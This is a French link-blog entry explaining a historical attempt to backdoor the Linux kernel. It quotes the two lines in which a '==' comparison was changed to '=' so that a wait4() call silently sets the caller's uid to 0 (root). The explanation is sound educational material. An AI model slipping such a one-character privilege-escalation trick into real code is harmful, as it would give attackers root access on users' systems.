Shaare your links...
32749 links
Liens en vrac de sebsauvage Home Login RSS Feed ATOM Feed Tag cloud Picture wall Daily
Links per page: 20 50 100
page 1 / 1
  • Linux sécurité
    An attempt to backdoor the kernel [LWN.net]
    Ça ressemble à quoi une backdoor dans un Kernel linux ?
    C'est aussi simple que remplacer "==" par "=" comme cela a été fait dans ces deux lignes de code:
          if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
                          retval = -EINVAL;

    Ce qui ressemblait à l'origine à un contrôle de droits ("L'utilisateur est-il bien root ?") devient "On DONNE les droits root".
    Donc n'importe qui qui aurait appelé cette fonction système wait4() avec ces deux flags actifs aurait obtenu l'accès root.

    Un seul caractère supprimé, et voilà une backdoor pour obtenir l'accès root sur un système.  Devil is in the details.
    2013-09-25 17:16:41
    http://lwn.net/Articles/57135/
Links per page: 20 50 100
page 1 / 1
Shaarli 0.0.41 beta modifiée - 2022-08-11 - The personal, minimalist, super-fast, no-database delicious clone. By sebsauvage.net. Theme by idleman.fr. I'm on Mastodon.
shelter.moe